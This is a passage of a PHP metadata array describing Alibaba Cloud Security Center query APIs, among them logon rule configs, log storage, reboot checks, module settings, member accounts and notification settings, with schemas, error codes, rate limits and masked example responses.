[ 'description' => 'The logon configuration details.', 'type' => 'object', 'properties' => [ 'EndTime' => ['description' => 'The end time of the common logon time range.', 'type' => 'string', 'example' => '07:00', 'title' => ''], 'Account' => ['description' => 'The common logon account.', 'type' => 'string', 'example' => '1582318****', 'title' => ''], 'StartTime' => ['description' => 'The start time of the common logon time range.', 'type' => 'string', 'example' => '08:00', 'title' => ''], 'Ip' => ['description' => 'The common logon IP address.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'TotalCount' => ['description' => 'The total number of servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '172', 'title' => ''], 'UuidCount' => ['description' => 'The number of servers on which the rule takes effect.', 'type' => 'integer', 'format' => 'int32', 'example' => '13', 'title' => ''], 'Location' => ['description' => 'The common logon location.', 'type' => 'string', 'example' => 'BeiJing', 'title' => ''], 'TargetList' => [ 'description' => 'The list of details about the servers on which the rule takes effect.', 'type' => 'array', 'items' => [ 'description' => 'The details about the server on which the rule takes effect.', 'type' => 'object', 'properties' => [ 'Target' => ['description' => 'The UUID of the server or the ID of the server group on which the rule takes effect.', 'type' => 'string', 'example' => '0011ea53-738c-4bff-93be-ce6a1cc9****', 'title' => ''], 'TargetType' => ['description' => 'The selection mode for the assets on which the rule takes effect. Valid values:'."\n" ."\n" .'- **uuid**: added by individual asset.'."\n" .'- **groupId**: added by server group.'."\n" .'- **global**: all assets are selected.', 'type' => 'string', 'example' => 'uuid', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Remark' => ['description' => 'The remark information displayed for the corresponding configuration.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query unusual logon detection rule configurations', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLoginBaseConfigs'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeLoginBaseConfigs', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"2C2D4B3C-0524-17B1-93D2-DA50119F4E1E\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 200,\\n \\"BaseConfigs\\": [\\n {\\n \\"EndTime\\": \\"07:00\\",\\n \\"Account\\": \\"1582318****\\",\\n \\"StartTime\\": \\"08:00\\",\\n \\"Ip\\": \\"192.168.XX.XX\\",\\n \\"TotalCount\\": 172,\\n \\"UuidCount\\": 13,\\n \\"Location\\": \\"BeiJing\\",\\n \\"TargetList\\": [\\n {\\n \\"Target\\": \\"0011ea53-738c-4bff-93be-ce6a1cc9****\\",\\n \\"TargetType\\": \\"uuid\\"\\n }\\n ],\\n \\"Remark\\": \\"test\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeLoginSwitchConfigs' => [ 'summary' => 'Queries the alerting status for unapproved logon IP addresses, unapproved logon time ranges, or unapproved logon accounts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The number of returned configuration items.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****', 'title' => ''], 'ConfigList' => [ 'description' => 'The configuration item returned.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The body of the message.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the Log Service feature. Valid values:'."\n" ."\n" .'* **0**: The feature is disabled.'."\n" .'* **1**: The feature is enabled.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Item' => ['description' => 'The type of the alert that you enabled or disabled. Valid values:'."\n" ."\n" .'* **login\\_common_ip**: alerts for unapproved logon IP addresses'."\n" .'* **login\\_common_time**: alerts for unapproved logon time ranges'."\n" .'* **login\\_common_account**: alerts for unapproved logon accounts', 'type' => 'string', 'example' => 'login_common_ip', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeLoginSwitchConfigs', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLoginSwitchConfigs'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeLoginSwitchConfigs', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Count\\": 2,\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\",\\n \\"ConfigList\\": [\\n {\\n \\"Status\\": 0,\\n \\"Item\\": \\"login_common_ip\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeLogstoreStorage' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set this parameter to **sas**.', 'type' => 'string', 'required' => true, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Used' => ['description' => 'The used log analysis storage capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '335', 'title' => ''], 'Ttl' => ['description' => 'The number of days for which logs are retained. The value is fixed as **180**, which indicates that logs can be retained for 180 days.'."\n" .'> Security Center does not support adjusting the log retention period.', 'type' => 'integer', 'format' => 'int32', 'example' => '180', 'title' => ''], 'Logstore' => ['description' => 'The name of the dedicated Logstore in which full logs of Security Center are stored. The value is fixed as **sas-log**.', 'type' => 'string', 'example' => 'sas-log', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '25EC270F-5783-4416-AD7C-1EDF063A039C', 'title' => ''], 'Preserve' => ['description' => 'The purchased log analysis storage capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '12240', 'title' => ''], 'UserProject' => ['description' => 'The name of the dedicated Project in which full logs of Security Center are stored.', 'type' => 'string', 'example' => 'sas-log-XXXX-cn-hangzhou', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 200 => [ ['errorCode' => 'DataNotExist', 'errorMessage' => 'Logstore data not exist.', 'description' => ''], ], 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query log analysis storage capacity of security center', 'summary' => 'Queries the log analysis storage capacity of Security Center.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLogstoreStorage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeLogstoreStorage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Used\\": 335,\\n \\"Ttl\\": 180,\\n \\"Logstore\\": \\"sas-log\\",\\n \\"RequestId\\": \\"25EC270F-5783-4416-AD7C-1EDF063A039C\\",\\n \\"Preserve\\": 12240,\\n \\"UserProject\\": \\"sas-log-XXXX-cn-hangzhou\\"\\n}","type":"json"}]', ], 'DescribeMachineCanReboot' => [ 'summary' => 'Checks whether a server can be restarted when a vulnerability fix requires a restart to take effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability that requires a restart to fix. Valid values:'."\n" .'- cve: Linux software vulnerability'."\n" .'- sys: Windows system vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'sys', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to restart.', 'type' => 'string', 'required' => false, 'example' => '5b268326-273e-44fc-a0e3-9482435c****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CanReboot' => ['description' => 'Indicates whether the server can be restarted. Valid values:'."\n" ."\n" .'- **true**: The server can be restarted.'."\n" .'- **false**: The server cannot be restarted.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query whether a server can be restarted', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeMachineCanReboot'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeMachineCanReboot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CanReboot\\": true,\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\"\\n}","type":"json"}]', ], 'DescribeMatchedMaliciousNames' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Levels', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The risk levels of the malicious samples in images to query. You can specify multiple values. Separate multiple values with commas (,). Valid values:'."\n" .'- **serious**: urgent'."\n" .'- **suspicious**: suspicious'."\n" .'- **remind**: reminder.', 'type' => 'string', 'required' => false, 'example' => 'serious', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C7CD1BE6-97A2-5524-A529-B55C63E55D59'], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query. If paging is not used, this value indicates the total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'array', 'items' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The key of the malicious sample type.', 'type' => 'string', 'example' => 'key', 'title' => ''], 'DisplayName' => ['description' => 'The display name of the malicious sample type.', 'type' => 'string', 'example' => 'displayname', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query malicious file types', 'summary' => 'Queries the list of malicious file types.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeMatchedMaliciousNames'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeMatchedMaliciousNames', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C7CD1BE6-97A2-5524-A529-B55C63E55D59\\",\\n \\"Count\\": 1,\\n \\"Data\\": [\\n {\\n \\"Key\\": \\"key\\",\\n \\"DisplayName\\": \\"displayname\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeModuleConfig' => [ 'summary' => 'Queries the settings of the Asset Fingerprints module.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The request ID. It is a unique identifier that Alibaba Cloud generates for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Count' => ['description' => 'The number of module settings.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ModuleConfigList' => [ 'description' => 'The list of module settings.', 'type' => 'array', 'items' => [ 'description' => 'The module setting information.', 'type' => 'object', 'properties' => [ 'ModuleName' => ['description' => 'The module name.', 'type' => 'string', 'example' => 'alihids', 'title' => ''], 'ConfigName' => ['description' => 'The configuration name.', 'type' => 'string', 'example' => 'timescan', 'title' => ''], 'Items' => [ 'description' => 'The list of configuration items.', 'type' => 'array', 'items' => [ 'description' => 'The configuration item.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'a47e3713-ed22-4015-93a3-d88ebe6****', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group.', 'type' => 'integer', 'format' => 'int32', 'example' => '173', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'inStanceName****', 'title' => ''], 'Region' => ['description' => 'The region in which the server resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Ip' => ['description' => 'The IP address of the server.', 'type' => 'string', 'example' => '31.13.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-uf6435dn4t59b9av****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve asset fingerprints module settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeModuleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeModuleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HttpStatusCode\\": 200,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"Success\\": true,\\n \\"Count\\": 2,\\n \\"ModuleConfigList\\": [\\n {\\n \\"ModuleName\\": \\"alihids\\",\\n \\"ConfigName\\": \\"timescan\\",\\n \\"Items\\": [\\n {\\n \\"Uuid\\": \\"a47e3713-ed22-4015-93a3-d88ebe6****\\",\\n \\"GroupId\\": 173,\\n \\"InstanceName\\": \\"inStanceName****\\",\\n \\"Region\\": \\"cn-hangzhou\\",\\n \\"Ip\\": \\"31.13.XX.XX\\",\\n \\"InstanceId\\": \\"i-uf6435dn4t59b9av****\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeMonitorAccounts' => [ 'summary' => 'Queries the list of accounts that are added to the multi-account management feature as members.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92140', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6BF880', 'title' => ''], 'AccountIds' => [ 'description' => 'The IDs of the members.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the member.'."\n", 'type' => 'string', 'example' => '179787636344****', 'title' => ''], 'title' => '', 'example' => '', ], 'AccountIdInfos' => [ 'description' => 'List of member account information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'AccountId' => ['description' => 'The Alibaba Cloud account ID of the member.'."\n", 'type' => 'string', 'example' => '119593010538****', 'title' => ''], 'OperatorUid' => ['description' => 'The account ID of the operator.'."\n", 'type' => 'string', 'example' => '106635707417****', 'title' => ''], 'AddTime' => ['description' => 'The time when it was added to the control list, in timestamp format with second precision.', 'type' => 'integer', 'format' => 'int64', 'example' => '1760520684000', 'title' => ''], 'SasVersion' => ['description' => 'The purchased version of Cloud Security Center. Values:'."\n" .'- **0** or **1**: Free Edition '."\n" .'- **2** or **3**: Enterprise Edition'."\n" .' - **5**: Advanced Edition '."\n" .'- **6**: Anti-Virus Edition '."\n" .'- **7**: Flagship Edition', 'type' => 'string', 'example' => '7', 'title' => ''], 'PostBasicService' => ['description' => 'Basic service switch. Values: '."\n" .'- **0**: Off '."\n" .'- **1**: On', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'DescribeMonitorAccounts', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeMonitorAccounts'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeMonitorAccounts', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6BF880\\",\\n \\"AccountIds\\": [\\n \\"179787636344****\\"\\n ],\\n \\"AccountIdInfos\\": [\\n {\\n \\"AccountId\\": \\"119593010538****\\",\\n \\"OperatorUid\\": \\"106635707417****\\",\\n \\"AddTime\\": 1760520684000,\\n \\"SasVersion\\": \\"7\\",\\n \\"PostBasicService\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeNeedAsyncQuery' => [ 'summary' => 'Queries whether slow queries need to be optimized.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92141', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the query. Valid values:'."\n" ."\n" .'* **suspicious**: alerts'."\n", 'type' => 'string', 'required' => true, 'example' => 'suspicious', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether the result is returned. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX\\"\\n}","type":"json"}]', 'title' => 'DescribeNeedAsyncQuery', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeNeedAsyncQuery'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeNeedAsyncQuery', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeNoticeConfig' => [ 'summary' => 'Queries notification settings.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '60.191.XX.XX', 'title' => ''], ], [ 'name' => 'BizType', 'in' => 'query', 'schema' => ['description' => 'Notification configuration type, with values:'."\n" .'- **Default (not provided)**: SMS/Email/Site Message '."\n" .'- **cms**: Cloud Monitor Push', 'type' => 'string', 'required' => false, 'example' => 'cms', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'D185B7FF-E24C-422D-83D3-C2A25C7A2727', 'title' => ''], 'NoticeConfigList' => [ 'description' => 'An array that consists of the notification settings.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The notification settings.'."\n", 'type' => 'object', 'properties' => [ 'TimeLimit' => ['description' => 'The time period during which Security Center sends notifications. Valid values:'."\n" ."\n" .'* **0**: any time'."\n" .'* **1**: 08:00 to 22:00'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AliUid' => ['description' => 'The ID of the user.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '12123414****', 'title' => ''], 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Project' => ['description' => 'The identifier of the notification item. Valid values:'."\n" ."\n" .'* **yundun\\_security_Weekreport**: notification for vulnerabilities'."\n" .'* **yundun\\_sas\\_antiransomware_task**: notification for results of restoration tasks'."\n" .'* **sas_healthcheck**: notification for baseline checks'."\n" .'* **sas_suspicious**: notification for alerts generated by Security Center'."\n" .'* **yundun\\_aegis\\_AV_true**: notification for precision defense'."\n" .'* **yundun\\_sas\\_ak_leakage**: notification for AccessKey pair leaks'."\n" .'* **yundun\\_sas\\_config_alert**: notification for configuration assessment'."\n" .'* **yundun\\_sas\\_vul_Emergency**: notification for urgent vulnerabilities'."\n" .'* **yundun\\_webguard_event**: notification for web tamper proofing'."\n" .'* **yundun\\_sas\\_cloud\\_native_firewall**: notification for alerts generated by the container firewall feature'."\n" .'* **yundun\\_sas\\_cloud\\_native\\_firewall_Defense**: notification for proactive defense implemented by the container firewall feature'."\n" .'* **yundun\\_IP_Blocking**: notification for blocked brute-force attacks initiated from malicious IP addresses'."\n" .'* **yundun\\_sas\\_anti\\_virus_config**: notification for virus scan'."\n" .'* **yundun\\_sas_log**: notification for excess logs'."\n" .'* **yundun\\_honeypot_alarm**: notification for alerts generated by the honeypot feature'."\n" .'* **aliyun\\_rasp_alarm**: notification for alerts generated by the application security feature'."\n" .'* **virusScheduleTask**: notification for completion of scheduled virus scans'."\n" .'* **yundun\\_anti_Virus**: notification that no security checks are performed'."\n" .'* **sas_vulnerability**: notification for vulnerabilities'."\n" .'* **weeklyreport**: notification for weekly reports'."\n" .'* **agent**: notification that the Security Center agent is offline'."\n" .'* **bruteforcesuccess**: notification for protection against brute-force attacks'."\n" .'* **webshell**: notification for webshells'."\n" .'* **suspicious**: notification for alerts generated by Server Guard'."\n" .'* **patch**: deprecated'."\n" .'* **remotelogin**: notification for remote logons'."\n" .'* **health**: notification for security checks'."\n" .'* **yundun\\_sas\\_cloudsiem_log**: notifications of insufficient threat analysis log capacity'."\n" ."\n" .'> If the value is **yundun\\_security_Weekreport**, weekly reports are sent to notify you of unhandled vulnerabilities.', 'type' => 'string', 'example' => 'sas_suspicious', 'title' => ''], 'Route' => ['description' => 'The notification method. Valid values:'."\n" ."\n" .'* **1**: text message'."\n" .'* **2**: email'."\n" .'* **4**: internal message'."\n" .'* **3**: text message and email'."\n" .'* **5**: text message and internal message'."\n" .'* **6**: email and internal message'."\n" .'* **7**: text message, email, and internal message'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'Category' => ['description' => 'Business categories under cloud monitoring notification configuration. Values:'."\n" .'- **Incident**: Security incidents. '."\n" .'- **Suspicious**: Security alerts. '."\n" .'- **Hc**: Baseline checks. '."\n" .'- **Cspm**: Cloud Security Posture Management. '."\n" .'- **Agentless**: Agentless detection. '."\n" .'- **Filedetect**: Malicious file SDK. '."\n" .'- **Vul**: Vulnerabilities. '."\n" .'- **Rasp**: Application protection.', 'type' => 'string', 'example' => 'Cspm', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'UnknownError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' 